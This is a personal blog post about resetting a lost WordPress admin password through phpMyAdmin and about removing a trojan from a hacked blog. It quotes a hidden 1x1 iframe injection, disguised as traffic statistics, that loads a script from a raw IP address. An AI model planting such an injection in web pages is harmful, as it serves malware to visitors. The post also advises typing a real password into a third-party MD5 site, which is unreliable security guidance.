OK, here is what you do: log into your admin area and to your dashboard (if you have your admin password).
On the far right, right next to the plugins you’ll find a link to “users”. Find the list of users, the first one is the admin.
Click on the word “admin” and it will take you to a page where at the bottom of the page you can put in a new password to replace the one that the installer has given you.

Easy as pie.

Do you need me to make you a video? Comment, please.

If you lost your admin password but still have access to your cpanel:
The newer versions of wordpress don’t allow you to change your password in a normal change password form, like before… quite screwy if you ask me.

Why screwy? because the password the wordpress installation creates for you, if you don’t use Fantastico, is one of those computer generated passwords… you can’t remember it.

The other times when you need to change the password is when you forgot it… or don’t want to give access to an old pal… whatever. I think wanting to change the password is quite legitimate.

Anyway, I bought a blogsite on ebay, and the seller didn’t remember the admin password, so I had to figure it out for myself.

If you have a php-myadmin access to your mysql databases, and you know how to browse and edit values, then you can change your admin password.
Go to phpmyadmin through your cpanel, select the correct database from the drop down menu, and select the wp-users table. cick “browse”, select the user “admin” and click on the pencil to edit the values there.

You’ll see that the password is encoded. Bummer, but don’t fret, the encoding is a known format, called MD5 Hash and there is a site on the web that can encode your password for you so that you can paste the new one over the old one. go to http://www.zappersoftware.com/Help/md5.php and type your password into the password field. click the submit button and voila, your encoded password is done. You’ll have to copy the 3rd row, the md5 hash format and paste it into your password field in phpmyadmin. For the time being, save it in a text file…

go to your phpmyadmin area and select the correct database, and then select the whole database

in the right frame click the browse symbol in the same row where wp_users are

you’ll see that next the the user, admin, the password is encoded.
Click on the pencil (edit) icon

on the next screen replace the long gibberish that is on the same row as user_pass with your saved encoded md5 hash password.

click save and test in the login area…

If you followed the instructions you should be able to log in with the new password. Of course you will use the unencoded password on the login page.

Except… one of my blogs, http://www.sophieschoice.org was attacked. Google flagged it, it took me a long time to even get to it… on the back door.

I searched for the iframe tags, removed them all, notified google that it was cleaned. In about 2 weeks they removed the block… today I checked it, and there you go, another trojan, this time it says:

<!– Traffic Statistics –> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>

Now, I haven’t checked if they infected wordpress own traffic checker program, or got into my site… yet. I’ll do that and follow up again.

The removal was easy… I went into “manage posts” and made a search for “iframe” and it gave me one blog post, I went into the html format and just simply deleted it.

I checked the “src” url in my browser and indeed the trojan was coming from there.

I’ll continue the saga… Now I have to check all my blogs… what a drag.

When I opened it a warning came up, that a Trojan (worm… not a virus… but just as annoying) was on my site…

I made a screen shot of some of the popup… I just needed the data… to search on google or on wordpress… or whereever.

I didn’t find anything meaningful on the internet, so I decided to move the whole blog to another server. To my dismay, the popup warning me of the trojan was still there.

I decided that the trojan must be somewhere in my posts…

I searched all my posts, one by one, in “html” mode, and I found one instance of the trojan embedded in an iframe, and 7 instances of links to some gambling site.

I was searching for the word “iframe” and for the word “Noscript”

With that search I found all occurrences and now I have a healthy blog… though spent a few hours with moving and setting up on a new location… but all is well when it ends well.